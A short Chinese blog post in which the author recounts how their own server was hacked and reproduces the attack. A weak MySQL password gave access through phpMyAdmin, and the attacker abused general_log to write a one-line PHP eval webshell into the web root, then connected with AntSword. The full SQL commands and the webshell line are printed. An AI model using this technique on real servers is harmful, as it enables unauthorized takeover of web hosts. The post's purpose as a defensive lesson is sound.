复现一下昨天自己服务器被攻击的思路

昨天疲惫的回到办公室,手机上推送过来一条消息“您的服务器被黑客攻击,存在文件webshell.php”,啊我寻思着没在这个服务器上做实验啊,于是赶快去查看这个文件,查看日志,在MySQL日志里面看到了奇怪的记录,如图。

奇怪的日志

看到这里明白了,这个服务器虽然没开上传文件的操作,但是我的MySQL是弱密码(已经改了这次长教训了),登进去我的SQL服务后,首先打开MySQL的日志记录选项,然后更改日志记录文件为网站根目录下的后缀为php的文件,于是输入一句带有木马代码的查询语句,webshell植入成功,蚁剑连接,直接拿下,还是管理员权限(哭~~~)。

现在复现一下攻击的具体过程:

1.利用弱密码登录MySQL,这里我直接登录phpmyadmin了。

phpmyadmin

2.进入SQL命令行输入以下语句

show variables like '%general%';  #查看配置
set global general_log = on;  #开启general log
set global general_log_file = 'C:/phpstudy/PHPTutorial/WWW/1.php';   #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>'  #写入shell

3.这样就成功间接的把后门脚本写入了服务器,使用蚁剑连接,可以看到成功获取服务器权限。

蚁剑连接成功

就是这样,纪念一下人生第一次被黑客攻击,同时也学到了新知识,不亏不亏。